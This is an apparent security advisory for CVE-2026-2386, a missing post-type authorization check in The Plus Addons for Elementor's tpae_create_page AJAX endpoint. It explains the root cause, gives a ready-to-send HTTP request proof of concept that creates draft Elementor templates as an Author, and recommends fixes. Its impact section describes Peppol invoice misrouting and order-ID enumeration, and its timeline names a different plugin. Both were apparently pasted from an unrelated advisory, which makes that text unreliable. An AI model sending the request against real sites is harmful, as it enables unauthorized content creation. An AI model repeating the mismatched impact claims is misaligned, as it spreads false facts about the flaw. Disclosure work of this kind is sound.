CVE-2026-2386 affects The Plus Addons for Elementor and it is an incorrect authorization vulnerability that lets a low privilege Elementor user create draft objects of post types they normally should not be able to create. The most important detail is that this is not about editing existing content. It is about crossing post type boundaries. An Author who only has edit_posts can still create draft Pages, Elementor templates, and other custom post types by supplying a client controlled post_type to an AJAX endpoint. That breaks the expectation that post type capabilities are enforced by WordPress, and it creates a security and governance problem because draft assets can be planted for later misuse. On sites with complex workflows, even draft creation can have side effects such as triggering automation, polluting template libraries, confusing editors, and setting up social engineering for administrators.
| CVE | CVE-2026-2386 |
| Plugin Version | The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce |
| All Time | 5 940 223 |
| Active installations | 100 000+ |
| Publicly Published | February 18, 2026 |
| Last Updated | February 18, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2386 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-plus-addons-for-elementor-page-builder/the-plus-addons-for-elementor-addons-for-elementor-page-templates-widgets-mega-menu-woocommerce-647-incorrect-authorization-to-authenticated-author-arbitrary-draft-post-creation-via-post-type |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| February 6, 2026 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| February 6, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 17, 2026 | Registered CVE-2026-2386 |
Discovery of the Vulnerability
The vulnerable surface is the AJAX endpoint wp-admin/admin-ajax.php?action=tpae_create_page implemented in the theme builder controls code. The handler verifies a nonce using check_ajax_referer for tp_nxt_install, which is a request integrity control, but it authorizes the caller only with current_user_can edit_posts. It then accepts post_type and page_name directly from POST and calls wp_insert_post with a fixed post_status draft. For post types like elementor_library and nxt_builder, it also writes template metadata that can make the new object appear as a valid Elementor template entry. The critical missing control is a post type specific capability check. WordPress defines per post type capability mappings, and creating objects of a post type should require that post type create_posts capability or an equivalent. Because the handler does not enforce that and trusts the attacker supplied post_type, any role that can access Elementor and has edit_posts can create drafts of arbitrary registered post types.
Understanding of Missing Auth attack’s
WordPress capability checks are not generic. edit_posts does not mean create anything. It typically means the user can create and edit standard posts. Pages and many custom post types have different caps. Elementor templates are also stored as their own post type and are normally restricted because template assets influence site wide presentation. CVE-2026-2386 violates that model by using a broad capability check and allowing the client to choose the target object type. This is a common authorization anti pattern where developers check one baseline capability and assume it implies permission for a more privileged action. In real deployments, cross post type draft creation can be abused in several ways. Attackers can fill the template library with misleading assets named to look legitimate, they can create drafts that appear in admin lists and clutter workflows, and they can plant content that administrators later publish by mistake. On sites with sensitive custom post types, mere creation might trigger hooks, indexing, or notifications, so creation itself can become a side effect attack vector even without publish privileges.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2026-2386, an attacker with Author+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post.php?post=491&action=elementor Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 105 Origin: http://127.0.0.1 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Author+ Cookies Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=tpae_create_page&security=theplus_editor_theme_builder.nonce_from_elementor_page&post_type=elementor_library&page_name=Injected+Template+Title____
The most serious outcome is misrouting of electronic invoices and structured EDI messages. If Peppol endpoint identifiers are used to route documents, an attacker can cause invoices to be delivered to the wrong recipient endpoint, which can expose business document data and create compliance issues. Even when misrouting does not leak full documents, corrupting endpoint identifiers can break invoicing flows, delay fulfilment, and create customer support incidents that are expensive to resolve. Another realistic scenario is broad data corruption through enumeration. Order IDs are typically sequential, so an attacker can iterate order_id values and poison many accounts quickly, especially if the access key is reusable across actions. This becomes an integrity and availability issue for back office operations because staff must identify and restore correct identifiers and potentially reissue documents. It is also a stealth risk. These changes can blend into normal system behavior and may not be noticed until invoices fail or are delivered incorrectly, which means attackers can create delayed impact sabotage that is hard to trace back.
Recommendations for Improved Security
The correct fix is to enforce post type specific authorization rather than relying on edit_posts. The handler should validate the requested post_type against a strict allow list of supported types and then check the appropriate capability for that type, such as the post type object cap create_posts or edit_posts mapping, and for pages require edit_pages or a create_pages equivalent. For Elementor templates, it should require a capability that only trusted roles have, or explicitly restrict template creation to administrators. Input validation should enforce safe page_name length and character set, and the endpoint should rate limit to prevent bulk abuse. From an operational perspective, site owners should review which roles have Elementor editor access, because Elementor access combined with edit_posts is often given broadly. Audit your elementor_library and related template post lists for unexpected drafts created by low privilege users, and consider adding monitoring for spikes in wp_insert_post activity triggered through admin-ajax endpoints. Applying least privilege to editor access and keeping plugins patched reduces the chance that a simple Author account becomes a content plane attacker.
By taking proactive measures to address Missing Auth like CVE-2026-2386 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website